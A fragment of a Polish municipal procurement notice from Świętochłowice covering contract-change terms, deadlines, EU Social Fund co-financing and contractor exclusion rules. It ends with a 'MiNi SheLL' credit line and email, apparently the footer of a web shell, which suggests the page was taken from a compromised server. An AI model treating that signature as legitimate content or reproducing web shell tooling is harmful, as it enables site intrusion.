a.zmniejszeniu lub zwiększeniu wartości wynagrodzenia Wykonawcy w przypadku ustawowej zmiany przepisów podatkowych, np. zmiana stawki podatku VAT,
b.dostosowaniu umowy do aktualnych wytycznych Instytucji Wdrażającej w przypadku konieczności wprowadzenia zmian będących następstwem zmian wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki,
c.zwiększenia lub zmniejszenia wynagrodzenia Wykonawcy w przypadku zmiany liczby uczestników w oparciu o ceną jednostkową za 1 uczestnika kursu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.swietochlowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Zamówień Publicznych - Urząd Miejski Świętochłowice ul. Katowicka 54..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.01.2015 godzina 10:00, miejsce: Wydział Zamówień Publicznych - Urząd Miejski Świętochłowice ul. Katowicka 54 pok.115-116.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach projektu systemowego pn. Mam zawód - mam pracę w regionie Priorytet IX, Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego Programu Operacyjnego Kapitał Ludzki 2007-2013

Zamawiający wykluczy z postępowania o udzielenie zamówienia Wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co Zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wykluczy z postępowania o udzielenie zamówienia Wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com